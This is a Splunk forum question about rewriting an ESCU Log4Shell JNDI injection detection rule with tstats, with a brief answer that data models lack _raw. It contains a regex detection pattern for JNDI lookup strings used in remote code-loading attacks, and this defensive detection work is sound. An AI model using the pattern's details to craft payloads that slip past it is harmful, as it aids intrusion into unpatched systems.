Hi Splunkers,
in my tasks I performed an exam of some already Splunk searches and one of these is about a Log4j vulnerability; in particular, I encountered the rules ESCU - Log4Shell JNDI Payload Injection Attempt - Rule that has the following code:
| from datamodel Web.Web | regex _raw="[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)\w+(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?" | fillnull | stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user | `log4shell_jndi_payload_injection_attempt_filter`
I noted the use of _raw field and that, even if a datamodel is used, tstats command is avoided and insted of it a normal stats is in the code. So I tried to translate it in a search which use tstats, something like that:
| tstats summariesonly=true fillnull_value="N/D" count from datamodel=Web by Web.log_region, Web.log_country, index, host, Web.src, Web.dest _raw
| `drop_dm_object_name("Web")`
| regex _raw="[jJnNdDiI]{4}(\:|\%3A|\/|\%2F)\w+(\:\/\/|\%3A\%2F\%2F)(\$\{.*?\}(\.)?)?"
and I got no result; following, I removed the regex filter and noted that, when the search is performed, the _raw filed is filled with "N/D" value. Does this mean that _raw cannot be used with tstats?
Correct. Datamodels do not contain _raw.
Correct. Datamodels do not contain _raw.